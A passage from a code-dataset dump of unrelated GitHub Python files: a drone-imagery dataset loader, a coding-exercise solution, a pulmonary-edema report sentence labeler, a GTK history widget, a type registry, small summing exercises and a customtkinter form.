self._check_exists():\n print(\"file already exists.\")\n\n if download and not self._check_exists():\n self.download()\n\n self.load_dataset()\n\n def download(self) -> None:\n \"\"\"Download a dataset, extract it and create the tiles.\"\"\"\n print(f'Downloading \"{self.dataset_type}\"')\n self.root = os.path.expanduser(self.root)\n fpath = os.path.join(self.root, self.filename)\n _urlretrieve(self.resources[self.dataset_type], fpath)\n\n if not os.path.exists(os.path.join(self.root, self.dataset_type)):\n print(f'Extracting \"{self.filepath}\"')\n os.system(f\"tar -xvf {self.filepath}\")\n os.system(f\"mv {self.dataset_type} {self.root}\")\n else:\n print(f'Folder \"{self.dataset_type}\" already exists.')\n\n image_chips = f\"{self.dataset_type}/image-chips\"\n label_chips = f\"{self.dataset_type}/label-chips\"\n\n if not os.path.exists(image_chips):\n os.mkdir(os.path.join(self.root, image_chips))\n if not os.path.exists(label_chips):\n os.mkdir(os.path.join(self.root, label_chips))\n\n run(os.path.join(self.root, self.dataset_type))\n\n def _check_exists(self) -> bool:\n if self.dataset_type not in self.resources.keys():\n print(f\"Unknown dataset {self.dataset_type}\")\n print(f\"Available dataset : {self.resources.keys()}\")\n sys.exit(0)\n\n if os.path.exists(self.filepath):\n return True\n else:\n return False\n\n def load_dataset(self):\n if self.data_mode == 0:\n list_chip = \"train.txt\"\n elif self.data_mode == 1:\n list_chip = \"valid.txt\"\n elif self.data_mode == 2:\n list_chip = 
\"test.txt\"\n\n files = [\n f\"{os.path.join(self.root, self.dataset_type)}/image-chips/{fname}\"\n for fname in load_lines(os.path.join(self.root, self.dataset_type, list_chip))\n ]\n self.image_files = files\n\n def __getitem__(self, idx) -> Tuple[Any, Any]:\n \"\"\"\n Args:\n idx (int): Index\n Returns:\n tuple: (img, target) where target is index of the target class.\n \"\"\"\n image_file = self.image_files[idx]\n label_file = image_file.replace(self.image_path, self.label_path)\n\n img = np.array(load_img(image_file))\n target = mask_to_classes(load_img(label_file))\n target = np.array(target)\n\n if self.transform is not None:\n img = Image.fromarray(img)\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = Image.fromarray(target)\n target = self.target_transform(target)\n return img, target\n\n def __len__(self) -> int:\n return len(self.image_files)\n\n def on_epoch_end(self):\n random.shuffle(self.image_files)\n\n\ndef load_lines(fname):\n with open(fname, \"r\") as f:\n return [line.strip() for line in f.readlines()]\n\n\ndef load_img(fname):\n return np.array(Image.open(fname))\n\n\ndef mask_to_classes(mask):\n return to_categorical(mask[:, :, 0], 6)\n\n\ndef to_categorical(y, num_classes=None, dtype=\"float32\"):\n \"\"\"Converts a class vector (integers) to binary class matrix.\n E.g. for use with categorical_crossentropy.\n Args:\n y: class vector to be converted into a matrix\n (integers from 0 to num_classes).\n num_classes: total number of classes. If `None`, this would be inferred\n as the (largest number in `y`) + 1.\n dtype: The data type expected by the input. Default: `'float32'`.\n Returns:\n A binary matrix representation of the input. The classes axis is placed\n last.\n Raises:\n Value Error: If input contains string value\n \"\"\"\n y = np.array(y, dtype=\"int\")\n input_shape = y.shape\n if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:\n input_shape = tuple(input_shape[:-1])\n y = y.ravel()\n if not num_classes:\n num_classes = np.max(y) + 1\n n = y.shape[0]\n categorical = np.zeros((n, num_classes), dtype=dtype)\n categorical[np.arange(n), y] = 1\n output_shape = input_shape + (num_classes,)\n categorical = np.reshape(categorical, output_shape)\n return categorical\n\n\ndef get_split(scene):\n if scene in train_ids:\n return \"train.txt\"\n if scene in val_ids:\n return \"valid.txt\"\n if scene in test_ids:\n return \"test.txt\"\n\n\ndef color2class(orthochip, img):\n ret = np.zeros((img.shape[0], img.shape[1]), dtype=\"uint8\")\n ret = np.dstack([ret, ret, ret])\n colors = np.unique(img.reshape(-1, img.shape[2]), axis=0)\n\n # Skip any chips that would contain magenta (IGNORE) pixels\n seen_colors = set([tuple(color) for color in colors])\n IGNORE_COLOR = LABELMAP[0]\n if IGNORE_COLOR in seen_colors:\n return None, None\n\n for color in colors:\n locs = np.where(\n (img[:, :, 0] == color[0]) & (img[:, :, 1] == color[1]) & (img[:, :, 2] == color[2])\n )\n ret[locs[0], locs[1], :] = INV_LABELMAP[tuple(color)] - 1\n\n return orthochip, ret\n\n\ndef image2tile(\n prefix,\n scene,\n dataset,\n orthofile,\n elevafile,\n labelfile,\n windowx,\n windowy,\n stridex,\n stridey,\n):\n\n ortho = cv2.imread(orthofile)\n label = cv2.imread(labelfile)\n\n assert ortho.shape[0] == label.shape[0]\n assert ortho.shape[1] == label.shape[1]\n\n shape = ortho.shape\n xsize = shape[1]\n ysize = shape[0]\n print(f\"converting {dataset} image {orthofile} {xsize}x{ysize} to chips ...\")\n\n counter = 0\n for xi in range(0, shape[1] - 
windowx, stridex):\n for yi in range(0, shape[0] - windowy, stridey):\n orthochip = ortho[yi : yi + windowy, xi : xi + windowx, :]\n labelchip = label[yi : yi + windowy, xi : xi + windowx, :]\n\n orthochip, classchip = color2class(orthochip, labelchip)\n\n if classchip is None:\n continue\n\n orthochip_filename = os.path.join(\n prefix, \"image-chips\", scene + \"-\" + str(counter).zfill(6) + \".png\"\n )\n labelchip_filename = os.path.join(\n prefix, \"label-chips\", scene + \"-\" + str(counter).zfill(6) + \".png\"\n )\n\n with open(f\"{prefix}/{dataset}\", mode=\"a\") as fd:\n fd.write(scene + \"-\" + str(counter).zfill(6) + \".png\\n\")\n\n cv2.imwrite(orthochip_filename, orthochip)\n cv2.imwrite(labelchip_filename, classchip)\n counter += 1\n\n\ndef run(prefix, size=300, stride=300):\n lines = [line for line in open(f\"{prefix}/index.csv\")]\n print(\n \"converting images to chips - this may take a few minutes but only needs to be done once.\"\n )\n\n for lineno, line in enumerate(lines):\n line = line.strip().split(\" \")\n scene = line[1]\n dataset = get_split(scene)\n\n orthofile = os.path.join(prefix, \"images\", scene + \"-ortho.tif\")\n elevafile = os.path.join(prefix, \"elevations\", scene + \"-elev.tif\")\n labelfile = os.path.join(prefix, \"labels\", scene + \"-label.png\")\n\n if os.path.exists(orthofile) and os.path.exists(labelfile):\n image2tile(\n prefix,\n scene,\n dataset,\n orthofile,\n elevafile,\n labelfile,\n windowx=size,\n windowy=size,\n stridex=stride,\n stridey=stride,\n )\n","repo_name":"jakartaresearch/earth-vision","sub_path":"earthvision/datasets/drone_deploy.py","file_name":"drone_deploy.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"69"}
+{"seq_id":"7483565700","text":"mo = ['a','e','i','o','u']\ncount = 0\nprev = \"\"\nwhile True:\n flag=False\n str = input()\n moo = 0\n ja = 0\n if str==\"end\":\n break\n for s in str:\n if s in mo:\n flag=True\n for s in str:\n if s in mo:\n moo+=1\n ja=0\n else:\n ja+=1\n moo=0\n if moo==3 or ja==3:\n flag=False\n for s in str:\n if prev==s:\n if s!=\"e\" or s!=\"o\":\n flag=False\n prev=s\n\n if flag:\n print(f\"<{str}> is acceptable\")\n else:\n print(f\"<{str}> is not acceptable\")\n\n","repo_name":"Doreki/Python","sub_path":"baek_jun/2_week/4659_re.py","file_name":"4659_re.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20830081276","text":"# \n# Identifies sentences relevant to the diagnosis of pulmonary edema and evaluates performance of algorithm \n# Requires PE_PATH environment variable to be set to root directory of codebase\n#\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport argparse\nimport math\nimport numpy as np \nimport pandas as pd\nimport pprint\nimport re \n\nfrom util.evaluate import evaluate\nfrom util.negation import is_positive\n\nclass CONSTANTS:\n\n noedema_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'no_edema_regex.csv')\n keywords_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'keywords_regex.csv')\n relatedrad_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'related_rad_regex.csv')\n nochange_file = os.path.join(os.environ['PE_PATH'], 'keywords', 'no_change_regex.csv')\n\ndef assign_keyword_label(sentence):\n \"\"\"\n sentence sentence to be labeled \n\n Returns a value indicating the presence/absence of pulmonary edema based on keyword-matching\n - 1.0 pulmonary edema present\n - 0.0 pulmonary edema absent\n - nan no mention of pulmonary edema\n \"\"\" \n # List of keywords indicating no pulmonary edema\n noedema_keywords = pd.read_csv(CONSTANTS.noedema_file)['regex'].tolist()\n # List of keywords related to pulmonary edema \n keywords = pd.read_csv(CONSTANTS.keywords_file)['regex'].tolist()\n \n flag = False \n keyword_label = float('nan')\n # First check if no pulmonary edema is explicitly mentioned \n for key in noedema_keywords:\n if re.search(key, sentence.lower()) is not None:\n flag = True \n keyword_label = 0.0\n\n # Use more general keyword approach to assign mention label \n if not flag:\n keyword_check = is_positive(sentence, keywords)\n if keyword_check is True: keyword_label = 1.0\n elif keyword_check is False: keyword_label = 0.0\n\n return keyword_label \n\ndef assign_related_rad(sentence):\n \"\"\"\n sentence sentence to be labeled \n\n Returns a value indicating the presence/absence of radiologic features related to, but not definitive for, pulmonary edema\n - 1.0 related radiologic feature present\n - 0.0 related radiologic feature absent\n - nan no mention of related radiologic feature\n \"\"\"\n # List of keywords for radiologic features related to pulmonary edema \n keywords = pd.read_csv(CONSTANTS.relatedrad_file)['regex'].tolist()\n\n related_rad_label = float('nan')\n # Check if there is any mention of a radiologic feature \n rad_check = is_positive(sentence, keywords, mode='sum')\n if rad_check is True: related_rad_label = 1.0\n elif rad_check is False: related_rad_label = 0.0\n\n return related_rad_label\n\ndef assign_other_finding(chexpert_row):\n \"\"\"\n chexpert_row output of CheXpert labeler (1, 0, nan) for 14 observations in chest radiographs, represented as a Series \n\n Returns a value indicating the presence/absence of other finding(s) that are not pulmonary edema \n - 1.0 other finding(s) present\n - 0.0 other finding(s) absent\n - nan no mention of other findings\n \"\"\"\n other_finding = float('nan')\n # Columns to ignore \n ignore_labels = set(['Reports', 'Edema', 'Support Devices', 'Enlarged Cardiomediastinum', 'Cardiomegaly', 'Pneumothorax'])\n for col in chexpert_row.index:\n # Skip if column should be ignored or if cell value is empty, e.g. 
no mention \n if col in ignore_labels or math.isnan(chexpert_row[col]): \n continue \n\n # If no finding is positive, then assume no other findings are present \n elif col == 'No Finding' and chexpert_row[col] == 1.0:\n for other_col in chexpert_row.index:\n if other_col not in ignore_labels.union(set(['Lung Opacity'])) and chexpert_row[other_col] == 0.0:\n other_finding = 0.0 \n\n # Handle 'Lung Opacity' label, which could be indicative of pulmonary edema depending on context\n elif col == 'Lung Opacity':\n # Bilateral opacities are a related radiographic finding for pulmonary edema\n if 'bilateral' in chexpert_row['Reports'] or 'both' in chexpert_row['Reports']:\n continue\n # Unilateral opacities are likely not relevant to pulmonary edema (indicative of other findings)\n elif 'right' in chexpert_row['Reports'] and 'left' not in chexpert_row['Reports']:\n other_finding = abs(chexpert_row[col])\n elif 'left' in chexpert_row['Reports'] and 'right' not in chexpert_row['Reports']:\n other_finding = abs(chexpert_row[col])\n\n # If not a special case, set other finding label equal to cell value \n elif math.isnan(other_finding):\n other_finding = abs(chexpert_row[col])\n\n # If there is positive mention of at least one finding, then other finding label should be 1.0\n else:\n other_finding = max(other_finding, abs(chexpert_row[col]))\n\n return other_finding \n\ndef get_other_finding_mention(chexpert_row):\n ignore_labels = set(['Reports', 'Edema', 'No Finding'])\n for col in chexpert_row.index:\n # Skip if column should be ignored or if cell value is empty, e.g. no mention \n if col not in ignore_labels and not math.isnan(chexpert_row[col]): \n return True \n\n return False \n\ndef get_final_label(sentence, chexpert_label, keyword_label, related_rad_label, other_finding, chexpert_row):\n \"\"\"\n sentence sentence to label\n chexpert_label CheXpert label for pulmonary edema\n keyword_label Keyword label from output of assign_keyword_label()\n related_rad_label Related radiologic feature label from output of assign_related_rad()\n other_finding Other finding label from output of assign_other_finding()\n chexpert_row output of CheXpert labeler (1, 0, nan) for 14 observations in chest radiographs, represented as a Series \n\n Returns a value indicating whether sentence is relevant or not relevant to pulmonary edema (1, 0)\n \"\"\"\n final_label = 0.0\n nochange_keywords = pd.read_csv(CONSTANTS.nochange_file)['regex'].tolist()\n\n # If pulmonary edema is mentioned as present, then consider sentence relevant\n if chexpert_label == 1.0 or keyword_label == 1.0:\n final_label = 1.0\n\n # If pulmonary edema is mentioned as absent, then consider sentence relevant \n elif chexpert_label == 0.0 or keyword_label == 0.0:\n final_label = 1.0\n\n # If there is a related radiographic feature and no mention of another finding, then consider sentence relevant\n elif not math.isnan(related_rad_label) and math.isnan(other_finding):\n final_label = 1.0\n\n # If sentence indicates no general change in condition, then consider it to be relevant\n if final_label == 0.0:\n for key in nochange_keywords:\n if re.search(key, sentence.lower()) is not None:\n # Exclude phrases like \"no change in cardiomegaly\" or \"stable atelectasis\"\n if not get_other_finding_mention(chexpert_row): \n final_label = 1.0\n break \n \n return final_label\n\ndef get_all_relevance_data(chexpert_row, metadata, true_labels):\n sentence = chexpert_row['Reports']\n chexpert_label = abs(chexpert_row['Edema'])\n chexpert_label_unprocessed = 
chexpert_row['Edema']\n other_finding = assign_other_finding(chexpert_row)\n keyword_label = assign_keyword_label(sentence)\n related_rad_label = assign_related_rad(sentence)\n\n final_label = get_final_label(sentence, chexpert_label, keyword_label, related_rad_label, other_finding, chexpert_row)\n\n if true_labels:\n return [sentence, metadata['subject'], metadata['study'], final_label, metadata['relevant'], chexpert_label, chexpert_label_unprocessed, \\\n keyword_label, related_rad_label, other_finding, metadata['comparison'], metadata['comparison label']]\n\n else:\n return [sentence, metadata['subject'], metadata['study'], final_label, chexpert_label, chexpert_label_unprocessed, keyword_label, \\\n related_rad_label, other_finding]\n\ndef print_incorrect(true_labels, predicted_labels):\n for index, sentence in true_labels.iterrows():\n if sentence['relevant'] != predicted_labels['relevant'][index]:\n print(predicted_labels['relevant'][index], sentence['relevant'], sentence['sentence']) \n\ndef evaluate_labeler(true_labels_path, predicted_labels_path, output_path=None):\n true_labels = pd.read_csv(true_labels_path)\n predicted_labels = pd.read_csv(predicted_labels_path)\n\n result = evaluate(true_labels['relevant'].values, predicted_labels['relevant'].values)\n\n if output_path is not None:\n result_df = pd.Series(result).to_frame()\n result_df.to_csv(output_path)\n \n pprint.pprint(result) \n print_incorrect(true_labels, predicted_labels) \n\ndef run_labeler(chexpert_label_path, metadata_labels_path, true_labels=False):\n chexpert_sentences = pd.read_csv(chexpert_label_path)\n metadata = pd.read_csv(metadata_labels_path, dtype={'subject': 'str', 'study': 'str'})\n \n all_data = []\n for index, row in chexpert_sentences.iterrows():\n processed_row = get_all_relevance_data(row, metadata.iloc[index, :], true_labels=true_labels)\n all_data.append(processed_row)\n\n columns = []\n if true_labels:\n columns = ['sentence', 'subject', 'study', 'relevant', 'ground_truth_relevant', 'chexpert_label', 'chexpert_unprocessed', \\\n 'keyword_label', 'related_rad_label', 'other_finding', 'comparison_finding', 'comparison_label']\n else:\n columns = ['sentence', 'subject', 'study', 'relevant', 'chexpert_label', 'chexpert_unprocessed', 'keyword_label', 'related_rad_label', 'other_finding']\n\n df = pd.DataFrame(all_data, columns=columns)\n return df \n\ndef main_label():\n \"\"\"\n Run and evaluate labeler for pulmonary edema relevance. Also saves output labels of automatic labeler\n\n Requires as inputs\n 1. CSV file with results of CheXpert labeler\n 2. Filename to write the results of this automatic labeler\n 3. 
CSV file with true labels (1, 0) \n    \"\"\"\n    parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n    # Relative paths to PE_PATH\n    parser.add_argument('chexpert_labels_path', type=str, help='Path to file with chexpert-labeled sentences')\n    parser.add_argument('output_labels_path', type=str, help='Path to file to write output labels')\n    parser.add_argument('true_labels_path', type=str, help='Path to file with ground-truth relevance labels')\n    args = parser.parse_args()\n\n    chexpert_labels_path = os.path.join(os.environ['PE_PATH'], args.chexpert_labels_path)\n    output_labels_path = os.path.join(os.environ['PE_PATH'], args.output_labels_path)\n    true_labels_path = os.path.join(os.environ['PE_PATH'], args.true_labels_path)\n\n    final_labels = run_labeler(chexpert_labels_path, true_labels_path, true_labels=True)\n    final_labels.to_csv(output_labels_path)\n\ndef main_evaluate():\n    \"\"\"\n    Evaluate results of automatic labeler that identifies whether a sentence is related to pulmonary edema diagnosis. \n    \n    Requires as inputs\n    1. CSV file with true labels (1, 0) \n    2. CSV file with predicted labels (1, 0)\n    3. Filename to write evaluation results \n    \"\"\"\n    parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n    # Relative paths to PE_PATH\n    parser.add_argument('true_labels_path', type=str, help='Path to file with ground-truth relevance labels')\n    parser.add_argument('predicted_labels_path', type=str, help='Path to file with predicted relevance labels')\n    parser.add_argument('output_path', type=str, help='Path to file to write evaluation results')\n    args = parser.parse_args()\n\n    true_labels_path = os.path.join(os.environ['PE_PATH'], args.true_labels_path) \n    predicted_labels_path = os.path.join(os.environ['PE_PATH'], args.predicted_labels_path)\n    output_path = os.path.join(os.environ['PE_PATH'], args.output_path)\n\n    # pass the parsed output path through so the evaluation results are actually written\n    evaluate_labeler(true_labels_path, predicted_labels_path, output_path=output_path)\n\ndef main_predict():\n    \"\"\"\n    Run labeler for pulmonary edema relevance. Also saves output labels of automatic labeler\n\n    Requires as inputs\n    1. CSV file with results of CheXpert labeler\n    2. Filename to write the results of this automatic labeler\n    3. 
CSV file with metadata\n \"\"\"\n parser = argparse.ArgumentParser(description='Get sentences relevant to pulmonary edema')\n\n # Relative paths to PE_PATH\n parser.add_argument('chexpert_labels_path', type=str, help='Path to file with chexpert-labeled sentences')\n parser.add_argument('output_labels_path', type=str, help='Path to file to write output labels')\n parser.add_argument('metadata_labels_path', type=str, help='Path to file with subject and study labels')\n args = parser.parse_args()\n\n chexpert_labels_path = os.path.join(os.environ['PE_PATH'], args.chexpert_labels_path)\n output_labels_path = os.path.join(os.environ['PE_PATH'], args.output_labels_path)\n metadata_labels_path = os.path.join(os.environ['PE_PATH'], args.metadata_labels_path)\n\n final_labels = run_labeler(chexpert_labels_path, metadata_labels_path)\n final_labels.to_csv(output_labels_path)\n\ndef test_script():\n chexpert = pd.read_csv(\"data/dataset-small/chexpert-labels-small.csv\", dtype={'subject': 'str', 'study': 'str'})\n metadata = pd.read_csv(\"data/dataset-small/sentences-split-small.csv\", dtype={'subject': 'str', 'study': 'str'})\n print(get_all_relevance_data(chexpert.iloc[119, :], metadata.iloc[119, :], False))\n\nif __name__ == \"__main__\":\n main_evaluate()\n # main_label()\n # test_script()\n\n","repo_name":"shu98/pulmonary-edema-project","sub_path":"nlp/get_relevant_sentences_2.py","file_name":"get_relevant_sentences_2.py","file_ext":"py","file_size_in_byte":13917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21646133126","text":"import gi\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\ngi.require_version('WebKit', '3.0')\nfrom gi.repository import WebKit\n\n\nclass TranslationHistoryFileChooser(Gtk.FileChooserDialog):\n def __init__(self, parent):\n Gtk.FileChooserDialog.__init__(self, \"Please choose a file\", parent,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n\n\nclass TranslationHistoryToolbarWidget(Gtk.Toolbar):\n _parent = None\n\n def __init__(self, parent):\n self._parent = parent\n\n Gtk.Toolbar.__init__(self)\n\n self.set_style(Gtk.ToolbarStyle.TEXT)\n self.insert(self.widget_remove_selected, 0)\n self.insert(self.widget_remove_all, 1)\n self.insert(self.widget_export_csv, 2)\n self.insert(self.widget_save, 3)\n\n @property\n def widget_remove_selected(self):\n button = Gtk.ToolButton()\n button.set_label(\"Remove selected\")\n button.connect(\"clicked\", self._parent.on_button_remove_selected)\n return button\n\n @property\n def widget_remove_all(self):\n button = Gtk.ToolButton()\n button.set_label(\"Remove all\")\n button.connect(\"clicked\", self._parent.on_button_remove_all)\n return button\n\n @property\n def widget_export_csv(self):\n button = Gtk.ToolButton()\n button.set_label(\"Export as CSV\")\n button.connect(\"clicked\", self._parent.on_button_export_csv)\n return button\n\n @property\n def widget_save(self):\n button = Gtk.ToolButton()\n button.set_label(\"Save changes\")\n button.connect(\"clicked\", self._parent.on_button_save)\n return button\n\n\nclass TranslationHistoryTreeWidget(Gtk.ScrolledWindow):\n _tree = None\n _store = None\n _dispatcher = None\n\n def __init__(self, window=None, dispatcher=None):\n self._store = Gtk.ListStore(bool, str, str)\n Gtk.ScrolledWindow.__init__(self)\n self.add(self.widget_tree)\n\n @property\n def store(self):\n return self._store\n\n @store.setter\n def store(self, value):\n for line in reversed(value):\n fields = line.strip(\"\\n\").split(';')\n if len(fields) >= 2:\n self._store.append([0, fields[0].strip(), fields[1]])\n self._tree.set_model(self._store)\n\n @property\n def widget_tree(self):\n self._tree = Gtk.TreeView()\n self._tree.append_column(self.widget_tree_checkbox)\n self._tree.append_column(self.widget_tree_date)\n self._tree.append_column(self.widget_tree_word)\n return self._tree\n\n @property\n def widget_tree_checkbox(self):\n checkbox = Gtk.CellRendererToggle()\n checkbox.connect(\"toggled\", self.on_cell_toggled)\n checkbox.set_padding(5, 5)\n return Gtk.TreeViewColumn(\"\", checkbox, active=0)\n\n @property\n def widget_tree_date(self):\n data = Gtk.CellRendererText()\n data.set_property(\"editable\", True)\n data.set_padding(5, 5)\n data.connect(\"edited\", self.on_data_edited)\n return Gtk.TreeViewColumn(\"Data\", data, text=1)\n\n @property\n def widget_tree_word(self):\n word = Gtk.CellRendererText()\n word.set_property(\"editable\", True)\n word.connect(\"edited\", self.on_word_edited)\n word.set_padding(5, 5)\n return Gtk.TreeViewColumn(\"Word\", word, text=2)\n\n def on_cell_toggled(self, widget, path):\n self._store[path][0] = not self._store[path][0]\n\n def on_data_edited(self, widget, path, text):\n self._store[path][1] = text\n\n def on_word_edited(self, widget, path, text):\n self._store[path][2] = text\n\n\nclass HistoryLabelWidget(Gtk.Label):\n def __init__(self):\n Gtk.Label.__init__(self)\n self.set_margin_top(8)\n 
self.set_margin_bottom(8)\n self.set_justify(Gtk.Justification.RIGHT)\n\n\nclass HistoryToolbarTopWidget(Gtk.Grid):\n _label = None\n _parent = None\n\n def __init__(self, parent):\n self._parent = parent\n self._label = HistoryLabelWidget()\n\n Gtk.Grid.__init__(self)\n self.attach(self._button, 0, 0, 1, 1)\n self.attach(self._label, 1, 0, 4, 1)\n\n @property\n def label(self):\n self._label.get_label()\n\n @label.setter\n def label(self, value):\n self._label.set_label(value)\n\n @property\n def _button(self):\n button = Gtk.ToolButton()\n button.set_label(\"History file\")\n button.connect(\"clicked\", self._parent.on_history_file_choose)\n return button\n\n\nclass DictionaryHistoryAreaWidget(Gtk.VBox):\n _history = None\n _window = None\n _toolbar_top = None\n _toolbar_bottom = None\n\n def __init__(self, window, history):\n self._window = window\n self._history = history\n\n self._toolbar_top = HistoryToolbarTopWidget(self)\n self._toolbar_top.label = \": %s \" % self.history\n\n self._content = TranslationHistoryTreeWidget(self)\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n self._toolbar_bottom = TranslationHistoryToolbarWidget(self)\n\n Gtk.VBox.__init__(self, homogeneous=False, spacing=0)\n self.pack_start(self._toolbar_top, False, False, 0)\n self.pack_start(self._content, True, True, 0)\n self.pack_start(self._toolbar_bottom, False, True, 0)\n\n @property\n def history(self):\n return self._history.history\n\n def on_history_output(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n self._toolbar_top.label = \": %s \" % self.history\n\n def on_dictionary_clipboard(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n def on_dictionary_translation(self, event, dispatcher):\n self._content.store.clear()\n with open(self.history, 'r') as stream:\n self._content.store = stream.readlines()\n\n def on_button_remove_selected(self, button):\n for row in self._content.store:\n if row[0] is not False:\n self._content.store.remove(row.iter)\n\n def on_button_remove_all(self, button):\n self._content.store.clear()\n\n def on_button_export_csv(self, button):\n dialog = TranslationHistoryFileChooser(self._window)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n with open(dialog.get_filename(), 'w') as stream:\n for row in self._content.store:\n stream.write(\"%s;%s\\n\" % (row[1], row[2]))\n dialog.destroy()\n\n def on_button_save(self, button):\n with open(self.history, 'w') as stream:\n for row in reversed(self._content.store):\n stream.write(\"%s;%s\\n\" % (row[1], row[2]))\n\n def on_history_file_choose(self, button):\n dialog = TranslationHistoryFileChooser(self._window)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n self._window.on_dictionary_history_changed(dialog.get_filename())\n dialog.destroy()\n","repo_name":"AlexWoroschilow/dictionary-indicator","sub_path":"vendor/uix/widget/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14195201656","text":"from sentinels import NOTHING\n\n\n__all__ = [\n \"TypesRegistry\",\n \"get_registry\"\n]\n\n\nclass TypesRegistry:\n def __init__(self):\n self._mapping = {}\n self._back = {}\n\n def register(self, type_, alias):\n assert isinstance(type_, type)\n assert isinstance(alias, type)\n self._mapping[type_] = alias\n self._back[alias] = type_\n\n def get_alias(self, type_, default=NOTHING):\n if default is NOTHING:\n return self._mapping[type_]\n else:\n return self._mapping.get(type_, default)\n\n def get_type(self, alias, default=NOTHING):\n if default is NOTHING:\n return self._back[alias]\n else:\n return self._back.get(alias, default)\n\n\n_registry = TypesRegistry()\n\n\ndef get_registry():\n return _registry\n","repo_name":"Evgenus/versioned-data","sub_path":"versioned/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73502720540","text":"# values = [1, 2, 3, 4, 5]\n# def list_sum():\n# total = 0\n# for value in values:\n# total += value\n# return total\n# print(list_sum())\n\ndicts = [{'name': 'kim', 'age': 12}, {'name': 'lee', 'age': 4}]\ndef dict_list_sum():\n total = 0\n for value in dicts:\n total += value['age']\n return total\nprint(dict_list_sum())\n\n# values = [[1], [2, 3], [4, 5, 6], [7, 8, 9, 10]]\n# def all_list_sum():\n# total = 0\n# for value in values:\n# for i in value:\n# total += i\n# return total\n# print(all_list_sum())","repo_name":"LeesangyeopSSAFY/TIL","sub_path":"01_Python/0721/ws0721.py","file_name":"ws0721.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6588734457","text":"import tkinter.messagebox\nimport customtkinter\n\nclass Main():\n\n def load_main_page_view(app, ctk_frame):\n ctk_frame.grid_rowconfigure(0, minsize=10)\n ctk_frame.grid_rowconfigure(1, weight=1)\n ctk_frame.grid_columnconfigure(0, weight=1)\n\n app.ctkl_page_title = customtkinter.CTkLabel(master=ctk_frame,\n text=\"Sistema de Abertura de Nao Conformidades V2\",\n text_font=(\"Bebas Neue\", 2*app.CONTEXT))\n app.ctkl_page_title.grid(\n row=0, column=0, pady=app.CONTEXT, padx=app.CONTEXT)\n\n app.ctkf_form_content = customtkinter.CTkFrame(master=ctk_frame)\n app.ctkf_form_content.grid(row=1, column=0, sticky=\"nswe\",\n padx=app.CONTEXT, pady=app.CONTEXT)\n\n\n app.ctkf_form_content.grid_columnconfigure(0, weight=1)\n app.ctkf_form_content.grid_columnconfigure(1, weight=1)\n app.ctkf_form_content.grid_rowconfigure(0, minsize=10)\n app.ctkf_form_content.grid_rowconfigure(10, weight=1)\n\n app.ctkl_identity = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Identificacao\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_identity.grid(row=1, column=0, sticky=\"w\", pady=10, padx=0)\n\n app.ctks_identity = customtkinter.CTkOptionMenu(master=app.ctkf_form_content,\n values=[\"Light\", \"Dark\", \"System\"])\n app.ctks_identity.grid(row=2, column=0, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_description = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Descricao\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_description.grid(row=3, column=0, sticky=\"w\", pady=10, padx=0)\n app.ctke_description = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_description.insert(\n \"0.0\", \"Escreva aqui a descricao da nao conformidade\")\n app.ctke_description.grid(row=4, column=0, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_rootcause = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Analise de Causa Raiz\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_rootcause.grid(row=3, column=1, sticky=\"w\", pady=10, padx=20)\n app.ctke_rootcause = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_rootcause.insert(\n \"0.0\", \"Escreva aqui a sua analise de causa raiz\")\n app.ctke_rootcause.grid(row=4, column=1, sticky=\"we\", pady=10, padx=20)\n\n app.ctkl_solution = customtkinter.CTkLabel(master=app.ctkf_form_content,\n text=\"Acoes corretivas\",\n text_font=(\"Roboto Medium\", -16))\n app.ctkl_solution.grid(row=5, column=0, sticky=\"w\", pady=10, padx=20)\n\n app.ctke_solution = customtkinter.CTkTextbox(master=app.ctkf_form_content,\n height=app.CONTEXT*5, fg_color=\"grey25\")\n app.ctke_solution.insert(\n \"0.0\", \"Escreva aqui as acoes tomadas para solucionar o problema\")\n app.ctke_solution.grid(row=6, column=0, sticky=\"we\", pady=10, 